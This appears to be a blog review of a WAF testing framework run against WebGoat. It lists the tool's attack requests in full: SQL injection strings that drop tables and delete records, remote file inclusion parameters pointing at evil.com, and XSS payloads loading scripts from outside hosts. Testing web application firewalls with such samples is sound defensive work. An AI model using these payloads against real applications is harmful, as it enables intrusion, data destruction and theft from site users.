WAF Testing Framework is developed by Imperva employees (Yaniv Azaria, Amichai Shulman) and was presented at OWASP AppSec USA in 2012.
To work properly it requires:
- Windows OS
- Java 1.6
- WebGoat application
Deployment
WebGoat application is provided with the tool, or you can use one from other sources (e.g. OWASPbwa). Deployment process looks easy - install Java and run compiled exe-file, but still you need at least one Windows VM to run the tool.
The network scheme looks this way
Tests
If first attack is blocked, the tool stops sending similar requests. So to get whole list of attacks I've sent them to unprotected application. There is a list of all possible requests below, which include: 5 HTTP Parameter Pollution, 33 Remote File Inclusion, 17 Cross-Site Scripting, 10 SQL injection.
Besides that the tool sends 234 legit requests, supposed to cause false-positives like
message=We dropped a million Deutschemark to get the schematic (and it was not worth it)
message=this is not good; drop the item you are holding!&SUBMIT=Submit
message=select one item from these funny things =)
HTTP Parameter Pollution
message=' or '&message=' <> 'x'
message=' or '&message=' <> 'xxx'
message=' or '&message=' <> 'xyz'
message=' or '&message=' = ','
message=' union/*&message=*/select number from credit_card
Remote File Inclusion
bidirect=http://www.acbdef.com/index.html
isDirect=http://www.acbdef.com/index.html
p_direction=http://www.acbdef.com/index.html
p_redirect_uri=http://www.acbdef.com/index.html
redirect=http://www.acbdef.com/index.html
redirect_uri=http://www.acbdef.com/index.html
redirecturl=http://www.acbdef.com/index.html
strRedirect=http://www.acbdef.com/index.html
document_root=http://www.evil.com/getdata.php
spaw_root=http://www.evil.com/getdata.php
CONF_INCLUDE_PATH=http://www.evil.com/getdata.php
page=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
base_path=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
dir=http://www.evil.com/getdata.php
url=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
include_path=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
lng=http://www.evil.com/getdata.php
path_faqe=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
root=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
PathToRoot=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
template=http://www.evil.com/getdata.php
menu=http://www.evil.com/getdata.php
SQL Injection
message=' or 'a' = (select 'a')
message=' or 12345678 or 1=1
message= a' or 1 = (select 1 from dual)
message=a'; delete from customers where id = 12
message=a'; drop function login
message=a'; drop table users
message=a' or (case when 'a' then 1 else 0 end) = 0;
message=a' or (false) = 'c'
message=a' or (select 1) = 1
message=a' or -+!1= -+!1
Cross-Site Scripting (XSS)
message=<BODY ONLOAD=alert('XSS')>
message=<IMG DYNSRC="javascript:alert('XSS')">
message=<IMG SRC="  javascript:alert('XSS');">
message=<IMG SRC="jav
ascript:alert('XSS');">
message=<IMG SRC="javascript:alert('XSS');">
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=`javascript:alert("xxxx, 'XSS'")`>
message=<IMG SRC=javascript:alert("XSS")>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
message=<SCRIPT/SRC="http://www.evil.com/xss.js"></SCRIPT>
message=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Custom attacks
The framework provides ability to add additional requests in XML format. Template looks this way
<?xml version="1.0" encoding="UTF-8"?>
<http-recording>
<sequence repeat="1">
<request method="POST" protocol="http" protocol-version="HTTP/1.1" path="/sendmsg.jsp">
<headers>
<header name="Accept"><![CDATA[application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*]]></header>
<header name="Accept-Language"><![CDATA[en-US]]></header>
<header name="Content-Type"><![CDATA[application/x-www-form-urlencoded]]></header>
<header name="Pragma"><![CDATA[no-cache]]></header>
</headers>
<body><![CDATA[subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7]]></body>
<comment>Simple SQL Injection</comment>
</request>
</sequence>
</http-recording>
In request attributes should be set:
method:POSTprotocol:httpprotocol-version:HTTP/1.1pathincluding GET arguments:sendmsg.jsp
Addheadersto the requests likeAccept,Accept-Language,Content-Type,Pragma.
Requestbodyandcommentthat will be included in the report.
Resume
Report Example
Pros
- Easy to deploy if you have ready to use Windows environment
- Framework allows to add custom attack samples in XML-format
- Report looks nice
Cons
- Low attacks amount
- Attack samples are hard-coded somewhere inside compiled package
- Windows platform to run the tool
- No CSRF tokens support. If WAF adds CSRF token protection, all POST-requests would be blocked
- Works adequately only with custom WebGoat application
